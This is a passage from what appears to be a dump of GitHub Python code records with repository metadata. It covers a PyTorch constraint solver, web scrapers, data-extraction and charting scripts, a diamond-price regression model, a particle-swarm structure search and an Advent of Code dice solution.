defined as\n\n F(x,s) = [ F_eq(x) ; F_ineq(x) + s ]\n\n DR is an operator splitting approach, here applied to the splitting\n \n min g_1(x,s) + g_2(x,s)\n \n with\n g_1(x,s) = f(x) + i_{ (x,s) : F(x,s) = 0}\n g_2(x) = i_{ s : s>=0 }\n\n where i_{S} is the indicator function on set S.\n\n \"\"\"\n def __init__(self,f_obj = None, F_ineq = None, F_eq = None, x_dim = 0, n_ineq = 0, n_eq = 0,order = 'first',JF_fixed = False, parm_dim = None,num_steps=1):\n \"\"\"\n :param f_obj: functorch compatible function) a parameterized function f with input of the form (x,parms) where parms is a tensor that matches the batch of x, and has last dim parm features.\n f is defined unbatched, the method will call vmap, to \"raise\" f to batch dim\n gives the objective to be optimized\n :param F_ineq:(functorch compatible function) a parameterized function F with input of the form (x, parms) where parms is a tensor that matches the batch of x, and has last dim parm features.\n F is defined unbatched, the method will call vmap, to \"raise\" f to batch dim\n gives the inequality constraints to satisfy, F_ineq(x) <= 0\n :param F_eq:(functorch compatible function) a parameterized function F with input of the form (x, parms) where parms is a tensor that matches the batch of x, and has last dim parm features.\n F is defined unbatched, the method will call vmap, to \"raise\" f to batch dim\n gives the equality constraints to satisfy, F_eq(x) = 0\n :param x_dim: (int) dimension of the primal variables\n :param n_ineq: (int) number of inequality constraints\n :param n_eq: (int) number of equality constraints\n :param order: (str) one of {'first','second'} the order of the approximation used for f_obj\n :param JF_fixed: (Bool) Indicates if the Jacobian of F should be computed at each iteration. Default is False, if True Jacobian of F will be precomputed at x=0, parms = 0\n :param parm_dim: (int) the dimension of parms for precomputing Jacobian \n :param num_steps: (int) number of iteration steps for the Douglas Rachford method\n \"\"\"\n super().__init__()\n self.f_obj = f_obj\n self.F_ineq = F_ineq\n self.F_eq = F_eq\n self.x_dim = x_dim\n self.n_ineq = n_ineq\n self.n_eq = n_eq\n self.num_steps = num_steps\n self.order = order\n if n_eq > x_dim: print('ERROR: Equality constraints are overdetermined')\n #### Convert problem inputs to the standard form for the DR iterations\n\n #i.d. problem type\n #pid = \n # = 1 only equality constraints\n # = 2 only inequality constraints\n # = 3 both equality and inequality constraints\n # = 0 Error: no constraints\n pid = 2*(self.F_ineq != None) + (self.F_eq != None)\n self.pid = pid\n if pid == 0: print( 'ERROR: One of F_eq or F_ineq must be defined')\n if pid == 1:\n def F(xs, parms):\n return F_eq(xs,parms)\n if pid == 2:\n def F(xs,parms):\n x = xs[0:self.x_dim]\n s = xs[self.x_dim:]\n return self.F_ineq(x,parms) + s\n if pid ==3 :\n def Fs_ineq(xs,parms):\n x = xs[0:self.x_dim]\n s = xs[self.x_dim:]\n return torch.cat( (torch.zeros(self.n_eq), self.F_ineq(x,parms) + s))\n def Fs_eq(xs,parms):\n x = xs[0:self.x_dim]\n return torch.cat( (self.F_eq(x,parms), torch.zeros(self.n_ineq) ))\n def F(xs, parms):\n return Fs_eq(xs,parms) + Fs_ineq(xs,parms)\n self.F = F\n #### Set the Prox of g_1(x,s)\n self.JF_fixed = JF_fixed\n self.n_dim = self.x_dim + self.n_eq + self.n_ineq\n self.parm_dim = parm_dim\n if self.order == 'first': self.foF = px.FirstOrderObjectiveConstraintComposition(self.f_obj,self.F,JF_fixed = self.JF_fixed,n_dim = self.n_dim, parm_dim = self.parm_dim)\n if self.order == 'second': self.foF = px.SecondOrderObjectiveConstraintComposition(self.f_obj,self.F,JF_fixed = self.JF_fixed,n_dim = self.n_dim, parm_dim = self.parm_dim)\n ### Set the Prox of g_2(x,s)\n ## define the slack bounds\n upper_bound = 1e2*torch.ones(self.n_dim)\n lower_bound = torch.cat( (-1e2*torch.ones(self.x_dim + self.n_eq ),torch.zeros(self.n_ineq)))\n def f_upper(parms):\n return upper_bound\n def f_lower(parms):\n return lower_bound\n self.sp = px.BoxConstraint(f_lower,f_upper)\n def forward(self,x,parms):\n x = self.SlackHotStart(x,parms)\n x_k = x \n for n in range(self.num_steps):\n y_k = self.sp(x_k,parms)\n z_k = self.foF(2*y_k - x_k,parms)\n x_k_new = x_k + (z_k - y_k)\n x_k = x_k_new\n return x_k_new[:,:-self.n_ineq]\n def SlackHotStart(self,x,parms):\n x_init = x\n #add initial slack variables\n xz = torch.cat((x,torch.zeros((x.shape[0],self.n_ineq))),dim = -1)\n xs = torch.vmap(self.F)(xz,parms)\n slacks = -xs[:,-self.n_ineq:]\n x = torch.cat((x,slacks),dim = -1)\n s_plus = torch.cat( (torch.zeros(x.shape[0],self.x_dim),torch.relu(slacks)),dim = -1)\n grads = (self.foF.gamma/2)*self.foF.f_grad(x,parms)\n eta = s_plus + grads\n JFx = self.foF.JF(x,parms)\n ### Take a QR decomposition of the Jacobian\n with torch.no_grad():\n Q, R = torch.linalg.qr(torch.transpose(JFx,1,2),mode = 'complete')\n null_dim = Q.shape[-1] - R.shape[-1]\n R = R[:,:-null_dim,:]\n Qr = Q[:,:,:-null_dim]\n Qn = Q[:,:,-null_dim:]\n xs_plus = torch.cat( ( 1e3*torch.ones(x_init.shape),torch.relu(slacks)),dim = -1)\n P_diags = torch.abs(xs_plus) + 1e-3\n P_mats = torch.diag_embed(P_diags)\n QTPQ = torch.bmm(torch.transpose(Qr,1,2),torch.bmm(P_mats,Qr))\n # Compute the oblique projection\n xabs = torch.cat( (x_init,torch.abs(slacks)),dim = -1)\n xabs_vec = torch.unsqueeze(xabs,-1)\n eta_vec = torch.unsqueeze(eta,-1)\n z = torch.bmm(P_mats,xabs_vec - eta_vec)\n z = torch.bmm(torch.transpose(Qr,1,2),z)\n z = torch.linalg.solve(QTPQ,z)\n z = torch.bmm(Qr,z)\n z = z + eta_vec\n z = torch.squeeze(z,-1)\n new_slacks = z[:,-self.n_ineq:]\n new_slacks = 2*torch.relu(slacks) - new_slacks\n return torch.cat((z[:,0:-self.n_ineq],new_slacks),dim=-1)\n \n\n","repo_name":"pnnl/LOPO","sub_path":"DRcorrection/DRSolver.py","file_name":"DRSolver.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39305769717","text":"import lxml.html\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\nimport urllib\nimport lxml.html\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\ndataframe = {'genre':[], 'label':[], 'date':[], 'artist':[], 'score': [], 'text':[]}\n\n\n#Is passed an ablum review URL from get_reviews(). Scans url elements for key data points such as the album genre, label,\n#date of reivew, artist, album score, and the review text. This is done by finding the HTML classes associated with these\n#elements in the html code across differnt album reviews. Theses elements are appended to a dictionary.\ndef scrape(url):\n response = requests.get(url)\n\n response_text = response.text\n soup = BeautifulSoup(response_text, 'lxml')\n\n print(url)\n try:\n score = soup.find_all(['p', 'div'], {'class': rating(soup)})[0].text\n except:\n score = 'N/A'\n try:\n genre = soup.find_all('p', {'class' : 'BaseWrap-sc-UABmB BaseText-fETRLB InfoSliceValue-gTzwxg hkSZSE btxYx clvEtZ'})[0].text\n except:\n genre = 'N/A'\n print('missing gnre')\n try:\n label = soup.find_all('p', {'class' : 'BaseWrap-sc-UABmB BaseText-fETRLB InfoSliceValue-gTzwxg hkSZSE btxYx clvEtZ'})[1].text\n except:\n label = 'N/A'\n print('Missing label')\n try:\n date = soup.find_all('p', {'class' : 'BaseWrap-sc-UABmB BaseText-fETRLB InfoSliceValue-gTzwxg hkSZSE btxYx clvEtZ'})[2].text\n except:\n date = 'N/A'\n print('missing date')\n try:\n artist = soup.find_all('div', {'class' : 'BaseWrap-sc-UABmB BaseText-fETRLB SplitScreenContentHeaderArtist-lfDCdQ hkSZSE FFNqX PRayn'})[0].text\n except:\n artist = 'N/A'\n print('missing artist')\n try:\n text = soup.find_all ('div', {'class' : 'body__inner-container'})[0].text\n except:\n text = 'N/A'\n print('missing text')\n\n dataframe['genre'].append(genre)\n dataframe['label'].append(label)\n dataframe['date'].append(date)\n dataframe['artist'].append(artist)\n dataframe['score'].append(score)\n dataframe['text'].append(text)\n\ndef rating(soup):\n elements = soup.find_all(['p', 'div'])\n for element in elements:\n try:\n cl = ' '.join(element.attrs['class'])\n if 'Rating' in cl:\n return cl\n except:\n continue\n\n#Is passed an artist page url from get_artists. Finds all url's within the html of the artist page that refer to album\n#reviews. Passes the specic album review URL to scrape.\ndef get_reviews(artist_url):\n artist_url = artist_url + 'albumreviews'\n artist_response = requests.get(artist_url)\n soup = BeautifulSoup(artist_response.text, 'lxml')\n links = soup.find_all('a')\n for link in links:\n href = link.get('href')\n if '/reviews/albums/' in href and href != '/reviews/albums/':\n full_link = 'https://pitchfork.com' + href\n scrape(full_link)\n\n#Goes through links in the saved HTML that contain artist and appends them to the pitchfork url. This new URL for the\n#Specific arist is passed to get_reviews()\ndef get_artists(html):\n data = open(html, 'r', encoding=\"utf-8\")\n soup = BeautifulSoup(data, 'html.parser')\n links = soup.find_all('a')\n for link in links:\n href = link.get('href')\n if '/artists/' in href and href != '/artists':\n new_link = 'https://pitchfork.com/' + href\n print(new_link)\n get_reviews(new_link)\n\n\n\n#get_reviews('https://pitchfork.com/artists/3139-of-montreal/')\n#dataframe = pd.DataFrame(dataframe)\n#print(dataframe.head())\n\n\n'''All Pitchfork reviews are contrained in different Genre pages. From those pages you can access artists, and from those\nartist pages you can access every review. The artist list, however, exists on a infinitely scrolling javascript page and\nto scrape these URLs selenium was used to scroll to the bottom of the page and then save the loaded HTML to a text document.\n'''\n\nchromedriver = 'C:\\Datasets\\chromedriver.exe'\nos.environ['webdriver.chrome.driver'] = chromedriver\ndriver = webdriver.Chrome(chromedriver)\ndriver.get(\"https://pitchfork.com/artists/by/genre/jazz/\")\nScrollNumber = 500\nfor i in range(1,ScrollNumber):\n driver.execute_script(f\"window.scrollTo(1,{i*150})\")\n time.sleep(0.3)\n\nfile = open('C:/PF/PFjazz.html', 'w', encoding=\"utf-8\")\nfile.write(driver.page_source)\nfile.close()\n\ndriver.close()\n\nget_artists('C:/PF/PFjazz.html')\n\ndf = pd.DataFrame(dataframe)\ndf.to_excel('C:/PF/PFjazz.xlsx')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Eric-Zanette/Pitchfork-Scraper","sub_path":"Pitchfork Scraper.py","file_name":"Pitchfork Scraper.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29556497029","text":"\r\nfrom PatternExtractor import extract_emails\r\nfrom PatternExtractor import extract_phone\r\nfrom PatternExtractor import read_text_file\r\nfrom PatternExtractor import validate_data\r\n\r\n\r\n\r\n\r\ndef main():\r\n\t#Read text from file\r\n\r\n\ttext=read_text_file('file.txt')\r\n\r\n\t#Extract Emails and Phones from the text\r\n\r\n\temails=extract_emails(text)\r\n\tphone_numbers=extract_phone(text)\r\n\r\n\tprint(emails)\r\n\r\n\r\n\r\n\t#Validate extracted data\r\n\tvalid_emails=validate_data (emails)\r\n\tvalid_phone_numbers=validate_data(phone_numbers)\r\n\r\n\t#print the extracted and validated data\r\n\r\n\tprint(\"Valid Email Addresses:\", valid_emails)\r\n\t\r\n\r\n\t\r\n\tprint(\"\\nValid phone numbers:\",valid_phone_numbers)\r\n\t\r\n\tcontacts={'valid emails':', '.join(valid_emails),\r\n\t\t 'valid phones':', '.join(valid_phone_numbers)\r\n\t\t\t }\r\n\t\r\n\tprint(contacts)\r\n\r\n\t#store data to csv file\r\n\twith open('contacts.csv', 'a') as f:\r\n\t\t#create csv writer\r\n\t\twriter=csv.DictWriter(f,fieldnames=contacts.keys())\r\n\r\n\t\t#append row to the csv\r\n\r\n\t\twriter.writerow(contacts)\r\n\t\r\n\r\nif __name__=='__main__':\r\n\tmain()\r\n","repo_name":"nivin-L7/Project-Regex1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14663239239","text":"from openpyxl import load_workbook\r\nfrom openpyxl.chart import (\r\n RadarChart,\r\n Reference,\r\n)\r\nimport numpy as np\r\n\r\ndef read_all_data(worksheet):\r\n print(\"read_all_data...\")\r\n data_list = []\r\n for row in worksheet.values:\r\n for value in row:\r\n data_list.append(value)\r\n print(\"data_list\",data_list)\r\n dl = data_list\r\n return dl\r\n\r\ndef caculate_frequence(dl):\r\n print(\"caculate_frequence...\")\r\n data_small_large = sorted(dl)\r\n #print(\"data\",data)\r\n unique_data = np.unique(data_small_large)\r\n print(\"unique_data\",unique_data)\r\n data_times = []\r\n for i in unique_data:\r\n data_times.append(data_small_large.count(i))\r\n print(\"resdata\",resdata)\r\n times_total = sum(data_times)\r\n print(\"times_total\",times_total)\r\n data_freq = []\r\n for i in data_times:\r\n freq_i = i / times_total\r\n data_freq.append(freq_i)\r\n df = data_freq\r\n print(\"df\",df)\r\n return df\r\n\r\ndef draw_picture(df,dl):\r\n print(\"draw_picture...\")\r\n for row in df:\r\n ws.append(row)\r\n chart = RadarChart()\r\n chart.type = \"filled\"\r\n #labels = Reference(ws, min_col=1, min_row=2, max_row=13)\r\n data = Reference(ws, min_col=1, max_col=1, min_row=1, max_row=len(dl))\r\n chart.add_data(data, titles_from_data=False)\r\n #chart.set_categories(labels)\r\n chart.style = 26\r\n chart.title = \"wind direction frequence\"\r\n chart.y_axis.delete = True\r\n ws.add_chart(chart, \"B1\")\r\n wb.save(r\"路径\")#放所需要保存的路径\r\n\r\ndef no_none(dl):\r\n print(\"no_none...\")\r\n for item in dl[:]:\r\n if item == None:\r\n dl.remove(item)\r\n return dl\r\n\r\nif __name__==\"__main__\":\r\n file_name = r'路径' + str(78) + '.xlsx' # 读取数据的文件名\r\n wb = load_workbook(file_name) # 加载工作本\r\n #print(wb.sheetnames)\r\n ws = wb.active # 获取Sheet1\r\n data_list = read_all_data(ws) # 读取所有的data\r\n data_list = no_none(data_list) # 处理NaN(空值)\r\n data_freq = caculate_frequence(data_list) # 计算频率\r\n draw_picture(data_freq,data_list) # 画图\r\n\r\n","repo_name":"030319/Machine-Learning---Performance-Prediction","sub_path":"py对excel画图.py","file_name":"py对excel画图.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42974464417","text":"import numpy as np;\nimport matplotlib.pyplot as plt;\n\n\n\n\n\ndef bresenham(x0,y0,x1,y1):\n\tdx = x1-x0\n\tdy = y1-y0\n\tsx = np.sign(dx)\n\tsy = np.sign(dy)\n\tdx = np.abs(dx);\n\tdy = np.abs(dy)\n\terr = dx - dy\n\n\tout = [(x0,y0)]\n\tx = x0;\n\ty = y0;\n\n\n\twhile(x != x1 or y != y1):\n\t\te2 = err << 1\n\t\tif(e2 > -dy):\n\t\t\terr -= dy\n\t\t\tx += sx\n\t\tif(e2 < dx):\n\t\t\terr += dx\n\t\t\ty += sy\n\t\tout += [(x,y)]\n\treturn out,(x1,y1);\n\n\n\n# print(line)\n\n\n# line = [(0,0),(1,1),(2,2),(3,3)]\nfor k in range(0,3):\n\toutarr = np.zeros((100,100))\n\tfor j in range(0,10):\n\t\tt = np.random.randint(100,size=4)\n\t\ttalt = np.array([t[2],t[3],t[0],t[1]])\n\t\tline,s = bresenham(*t);\n\t\tline2,s2 = bresenham(*talt)\n\t\t# print(t, line,s)\n\t\tfor i in line:\n\t\t\toutarr[i[0],i[1]] = 1\n\t\t\t#outarr[s[0],s[1]] = -1\n\t\tfor i in line2:\n\t\t\toutarr[i[0],i[1]] = -1\n\tplt.matshow(outarr)\n\tplt.show();\n","repo_name":"uofu-ccts/prisms-comp-model-stham","sub_path":"test/bresenham.py","file_name":"bresenham.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41850856793","text":"from data.web_scrapping.isp.friendly.friendly_toolkit import FriendlyToolkit\nfrom utils.constants.common_data import common_data\nfrom utils.package import Package\nfrom utils.scalex_toolkit import get_soup\n\n\nclass FriendlyMobile(FriendlyToolkit):\n\n def __init__(self) -> None:\n super().__init__()\n self.soup = get_soup(self.FRIENDLY_MOBILE_URL)\n self.packages = []\n self.get_packages()\n\n def get_packages(self):\n blocks = self.soup.select(\"tr\")\n for index, block in enumerate(blocks):\n if any(w in block.text for w in [\"PRICE\"]):\n continue\n\n data = common_data.copy()\n data.update({\n \"service_type\": \"MOBILE\",\n \"plan_type\": \"PREPAID\",\n \"title\": \"Freedom Plan\",\n \"link\": self.FRIENDLY_MOBILE_URL,\n \"isp\": \"friendly\",\n })\n\n data[\"price\"] = self.search_for_value(\n block, \"td\", [\"ro\", \"bz\"])\n\n data[\"data_allowance\"] = self.search_for_value(\n block, \"td\", [\"gb\", \"mb\"], type=\"data_allowance\")\n\n data[\"duration\"] = self.search_for_value(\n block, \"td\", [\"hour\", \"day\", \"week\", \"unlimited\"], type=\"duration\")\n\n data[\"flexi_minutes\"] = self.search_for_value(\n block, \"td\", [\"flexi\"], type=\"flexi_minutes\")\n\n data[\"local_minutes\"] = self.search_for_value(\n block, \"td\", [\"local\"], type=\"local_minutes\")\n\n package = Package(data)\n self.packages.append(package)\n","repo_name":"alkuyomisb/scalex_engine","sub_path":"data/web_scrapping/isp/friendly/friendly_mobile.py","file_name":"friendly_mobile.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2697393003","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 28 21:57:09 2022\n\n\"\"\"\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport os\n\nfrom random import randint\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler, OrdinalEncoder\n\n\nfile_path = r\"B:\\MSI\\Downloads\\shrdc\\breast_cancer\\dataset\\diamonds.csv\"\nsave_path = r\"B:\\MSI\\Downloads\\shrdc\\diamond_price\\img\"\ndiamond_data = pd.read_csv(file_path)\n\ndiamond_data = diamond_data.drop('Unnamed: 0', axis=1)\ndiamond_features = diamond_data.copy()\ndiamond_label = diamond_features.pop('price')\n\nprint(\"------------------Features-------------------------\")\nprint(diamond_features.head())\nprint(\"-----------------Label----------------------\")\nprint(diamond_label.head())\n\ncut_categories = ['Fair', 'Good', 'Very Good', 'Premium', 'Ideal']\ncolour_categories = ['J', 'I', 'H', 'G', 'F', 'E', 'D']\nclarity_categories = ['I1', 'SI2', 'SI1', 'VS2', 'VS1', 'VVS2', 'VVS1', 'IF']\nordinal_encoder = OrdinalEncoder(categories=[cut_categories, colour_categories, clarity_categories])\ndiamond_features[['cut', 'color', 'clarity']] = ordinal_encoder.fit_transform(diamond_features[['cut', 'color', 'clarity']])\n\nprint(\"---------------Transformed Features--------------------\")\nprint(diamond_features.head())\n\nSEED = randint(100, 15000)\nx_train, x_iter, y_train, y_iter = train_test_split(diamond_features, diamond_label, test_size=0.4, random_state=SEED)\nx_val, x_test, y_val, y_test = train_test_split(x_iter, y_iter, test_size=0.5, random_state=SEED)\n\nstandard_scaler = StandardScaler()\nstandard_scaler.fit(x_train)\nx_train = standard_scaler.transform(x_train)\nx_val = standard_scaler.transform(x_val)\nx_test = standard_scaler.transform(x_test)\n\nnumber_input = x_train.shape[-1]\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.InputLayer(input_shape=number_input))\nmodel.add(tf.keras.layers.Dense(128, activation='elu'))\nmodel.add(tf.keras.layers.Dropout(0.25))\nmodel.add(tf.keras.layers.Dense(32, activation='elu'))\nmodel.add(tf.keras.layers.Dropout(0.25))\nmodel.add(tf.keras.layers.Dense(8, activation='elu'))\nmodel.add(tf.keras.layers.Dropout(0.25))\nmodel.add(tf.keras.layers.Dense(1))\n\nmodel.compile(optimizer='adam', \n loss='mse', \n metrics=['mae', 'mse'])\n\ntf.keras.utils.plot_model(model,\n to_file='model.png',\n show_shapes=True,\n show_layer_activations=True)\n\nbase_log_path = r\"B:\\MSI\\Downloads\\shrdc\\tensorboard_log\"\nlog_path = os.path.join(base_log_path, datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\ntb_callback = tf.keras.callbacks.TensorBoard(log_dir=log_path)\nes_callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=10, verbose=2)\nEPOCHS = 100\nBATCH_SIZE = 64\nhistory = model.fit(x_train, y_train,\n validation_data=(x_val, y_val),\n batch_size=BATCH_SIZE,\n epochs=EPOCHS,\n callbacks=[tb_callback, es_callback])\n\n\nplt.loglog(history.history['loss'])\nplt.loglog(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['training', 'validation'], loc='upper left')\nplt.grid(True, which=\"both\", ls=\"-\")\nplt.savefig(os.path.join(save_path, \"loss.png\"), bbox_inches='tight')\nplt.show()\nplt.clf()\n\nplt.loglog(history.history['mae'])\nplt.loglog(history.history['val_mae'])\nplt.title('model mae')\nplt.ylabel('mae')\nplt.xlabel('epoch')\nplt.legend(['training', 'validation'], loc='upper left')\nplt.grid(True, which=\"both\", ls=\"-\")\nplt.savefig(os.path.join(save_path, \"mae.png\"), bbox_inches='tight')\nplt.show()\nplt.clf()\n\ntest_result = model.evaluate(x_test, y_test, batch_size=BATCH_SIZE)\nprint(f\"Test loss = {test_result[0]}\")\nprint(f\"Test MAE = {test_result[1]}\")\nprint(f\"Test MSE = {test_result[2]}\\n\\n\")\n\npredictions = np.squeeze(model.predict(x_test))\nlabels = np.squeeze(y_test)\nplt.plot(predictions, labels, \".\")\nplt.xlabel(\"Predictions\")\nplt.ylabel(\"Labels\")\nplt.title(\"Graph of Predictions vs Labels with Test Data\")\nplt.savefig(os.path.join(save_path, \"result.png\"), bbox_inches='tight')\nplt.show()","repo_name":"aplatyps/shrdc_ai05_dp","sub_path":"diamond_price_prediction.py","file_name":"diamond_price_prediction.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40503220597","text":"import os\n\nfrom pso.tools.utils import * \nfrom pso.tools.psoutils import * \n\nfrom ase.io import read, write\nfrom pso.tools.operations import *\n\nclass PSO(object):\n \"\"\"\n A class for creating a linear polymer from given RdKit molecules.\n\n Examples\n ---------\n\n\n Note\n -----\n\n RDKit package must be installed.\n \"\"\"\n \n __slots__ = ['input_file', 'cluster_file', 'substrate_file']\n\n def __init__(self, input_file, cluster_file, substrate_file):\n \"\"\"\n Initialize this class.\n \n Parameters\n -----------\n\n input_file : class.str\n Name of the input.dat file supplied by the user.\n \n cluster_file : class.str\n Name of the POSCAR file containing the cluster coordinates supplied by the user.\n\n substrate_file: class.str\n Name of the POSCAR file containing the surface coordinates supplied by the user.\n \n \"\"\"\n \n self.input_file = input_file\n self.cluster_file = cluster_file \n self.substrate_file = substrate_file \n \n \n def pso_struct_search(self): # , input_file, cluster_file, substrate_file):\n\n input_file= self.input_file\n cluster_file=self.cluster_file\n substrate_file=self.substrate_file\n \n startstep, maxstep, pop, command, cores=read_input_file(str(input_file))\n z_min,acc_pop,omegamax,omegamin,c1,c2=read_input_pso(str(input_file))\n \n #Read the cluster.POSCAR file and convert to Cartesian with selective dynamics style\n clusters = read(str(cluster_file), format='vasp')\n substrate = read(str(substrate_file), format='vasp')\n \n parent_dir=os.getcwd()\n gen_count=startstep\n\n # Random numbers for struct_parameters, angles and r1,r2 coefficients\n values=global_random_numbers(maxstep, pop, seed=35, output_name=\"struct_param\")\n vel=global_random_numbers(maxstep, pop, seed=42, output_name=\"vel_param\")\n coeff=pso_random_numbers(maxstep, pop, seed=13, output_name=\"pso_r1_r2\")\n\n #History of gbests\n gbest=[0]*(maxstep-1)\n \n while gen_count < maxstep:\n \n directory=\"gen_{}\".format(str(gen_count))\n path = os.path.join(parent_dir, directory)\n \n try: \n os.mkdir(path)\n \n except OSError as error: \n print(error)\n \n if gen_count <= 1:\n \n os.chdir(path)\n gen_dir=os.getcwd()\n\n x_t=[]; v_t=[]\n for i in range(pop):\n name_new_str=\"\".join([\"POSCAR\"])\n x_t.append(structure_creator(clusters, substrate, name_new_str, values[gen_count-1][i],z_min))\n v_t.append(tuple(vel[gen_count-1][i]))\n make_config_folders(gen_dir, parent_dir, i, name_new_str)\n\n subfolders=sub_list(gen_dir)\n gbest[gen_count-1]=ord_dict(vasp_energy(command, subfolders, x_t, v_t, int(cores)))[0]\n os.chdir(parent_dir)\n \n else:\n os.chdir(path)\n gen_dir_new=os.getcwd()\n ord_confs, mask_keys=get_prev_gen(gen_dir_new, acc_pop, gen_count)\n\n xt_new=[]; vt_new=[]\n vel_new=np.asarray(vel)\n conf_name, gbest_pos=get_gbest_pos(gbest, parent_dir)\n\n omega_new=omegamax-((omegamax-omegamin)/maxstep)*(gen_count-2)\n print (omega_new)\n \n for i in range(pop):\n if mask_keys[i]:\n # Creating folders to store these structures\n idx=ord_confs[i].split('_')[-1]\n name_new_str_rest=\"\".join([\"POSCAR\"]) \n #The pso propagation scheme\n pos_update, tmp_vel= pso_update(gbest_pos, ord_confs[i], gen_count,\n omega_new, c1, c2, coeff[gen_count][i][0], coeff[gen_count][i][1]) \n xt_new.append(structure_creator(clusters, substrate, name_new_str_rest, pos_update, z_min))\n vt_new.append(tmp_vel)\n make_config_folders(gen_dir_new, parent_dir, idx, name_new_str_rest)\n\n #Creation of random structures discarded by user-provided acc_pop \n else:\n idxf=ord_confs[i].split('_')[-1]\n name_new_str_rest=\"\".join([\"POSCAR\"])\n xt_new.append(structure_creator(clusters, substrate,\n name_new_str_rest, values[gen_count][i], z_min))\n vt_new.append(tuple(vel[gen_count][i]))\n make_config_folders(gen_dir_new, parent_dir, idxf, name_new_str_rest)\n \n subfolders=sub_list(gen_dir_new)\n gbest[gen_count-1]=list(ord_dict(vasp_energy(command, subfolders, xt_new, vt_new, int(cores))))[0]\n\n os.chdir(parent_dir)\n print (\"Best explored structure: {}\".format(conf_name))\n \n gen_count += 1\n\n #This is needed to compare the last gbest agains the last best\n #structure found in the last folder.\n\n print (\"##############################################\")\n last_comparison_gbest(parent_dir, [gbest[-1], conf_name])\n print (\"##############################################\")\n \n","repo_name":"alejandrosantanabonilla/PSO","sub_path":"pso/main/struct_search.py","file_name":"struct_search.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39438836109","text":"from torch import nn\nimport torch\n\nclass StatisticsPooling(nn.Module):\n \"\"\"This class implements a statistic pooling layer.\n It returns the concatenated mean and std of input tensor.\n Example\n -------\n >>> inp_tensor = torch.rand([5, 100, 50])\n >>> sp_layer = StatisticsPooling()\n >>> out_tensor = sp_layer(inp_tensor)\n >>> out_tensor.shape\n torch.Size([5, 1, 100])\n \"\"\"\n def __init__(self):\n super().__init__()\n # Small value for GaussNoise\n self.eps = 1e-5\n\n def forward(self, x, lengths=None):\n \"\"\"Calculates mean and std for a batch (input tensor).\n Arguments\n ---------\n x : torch.Tensor\n It represents a tensor for a mini-batch.\n \"\"\"\n if lengths is None:\n mean = x.mean(dim=1)\n std = x.std(dim=1)\n else:\n mean = []\n std = []\n for snt_id in range(x.shape[0]):\n # Avoiding padded time steps\n actual_size = int(torch.round(lengths[snt_id] * x.shape[1]))\n\n # computing statistics\n mean.append(\n torch.mean(x[snt_id, 1 : actual_size - 1, ...], dim=0)\n )\n std.append(\n torch.std(x[snt_id, 1 : actual_size - 1, ...], dim=0)\n )\n mean = torch.stack(mean)\n std = torch.stack(std)\n gnoise = self._get_gauss_noise(mean.size(), device=mean.device)\n gnoise = gnoise\n mean += gnoise\n std = std + self.eps\n # Append mean and std of the batch\n pooled_stats = torch.cat((mean, std), dim=1)\n pooled_stats = pooled_stats.unsqueeze(1)\n return pooled_stats\n\n def _get_gauss_noise(self, shape_of_tensor, device=\"cpu\"):\n \"\"\"Returns a tensor of epsilon Gaussian noise.\n Arguments\n ---------\n shape_of_tensor : tensor\n It represents the size of tensor for generating Gaussian noise.\n \"\"\"\n gnoise = torch.randn(shape_of_tensor, device=device)\n gnoise -= torch.min(gnoise)\n gnoise /= torch.max(gnoise)\n gnoise = self.eps * ((1 - 9) * gnoise + 9)\n return gnoise","repo_name":"tuannvhust/keywordspotting_using_deep_learning","sub_path":"nnet/pooling.py","file_name":"pooling.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"36667366677","text":"# 38:24\r\n\r\nimport json\r\nimport numpy as np\r\nfrom functools import lru_cache\r\n\r\n@lru_cache(maxsize=None)\r\ndef calculate_num_wins(player_positions=json.dumps([0, 0]), player_scores=json.dumps([0, 0]), to_play=0):\r\n player_positions = json.loads(player_positions)\r\n player_scores = json.loads(player_scores)\r\n if player_scores[0] >= 21:\r\n return np.array([1, 0])\r\n if player_scores[1] >= 21:\r\n return np.array([0, 1])\r\n\r\n res = np.array([0, 0])\r\n # These are the counts of the number of ways to get 3, 4, ..., 9 from 3 dice rolls\r\n for total_roll, combos in enumerate([1, 3, 6, 7, 6, 3, 1]):\r\n total_roll += 3\r\n player_positions_copy = list(player_positions)\r\n player_positions_copy[to_play] = ((player_positions_copy[to_play] + total_roll - 1) % 10) + 1\r\n\r\n player_scores_copy = list(player_scores)\r\n player_scores_copy[to_play] += player_positions_copy[to_play]\r\n\r\n res += combos * calculate_num_wins(player_positions=json.dumps(player_positions_copy), player_scores=json.dumps(player_scores_copy), to_play=1 - 